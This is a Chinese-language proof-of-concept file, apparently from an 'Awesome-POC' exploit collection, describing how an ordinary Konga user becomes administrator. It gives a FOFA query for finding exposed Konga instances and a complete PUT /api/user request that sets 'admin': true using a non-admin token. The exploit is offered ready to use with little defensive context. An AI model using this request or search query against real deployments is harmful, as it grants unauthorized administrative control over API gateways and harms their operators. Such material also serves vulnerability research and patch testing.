Awesome-POC/Web应用漏洞/Konga 普通用户越权获取管理员权限漏洞.md

70 lines
967 B
Markdown
Raw Normal View History

2022-05-17 17:43:20 +08:00
# Konga 普通用户越权获取管理员权限漏洞
## 漏洞描述
Konga 普通用户通过发送特殊的请求可越权获取管理员权限
## 漏洞影响
```
Konga
```
## FOFA
```
"konga"
```
## 漏洞复现
登录页面
2022-12-05 11:09:28 +08:00
![image-20220210184626593](./images/202202101846658.png)
2022-05-17 17:43:20 +08:00
创建非管理员用户后登录并获取token
2022-12-05 11:09:28 +08:00
![](./images/202202101847245.png)
2022-05-17 17:43:20 +08:00
发送请求包, 将token修改为刚刚获取的
```plain
PUT /api/user/7 HTTP/1.1
Host: 127.0.0.1:1337
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/json;charset=utf-8
Content-Length: 241
{
"admin": true,
"passports": {
"password": "1234abcd",
"protocol": "local"
},
"password_confirmation": "1234abcd",
"token": "non-administrator user token"
}
```
2022-12-05 11:09:28 +08:00
![](./images/202202101847809.png)
2022-05-17 17:43:20 +08:00
成功转为管理员用户
2022-12-05 11:09:28 +08:00
![](./images/202202101847129.png)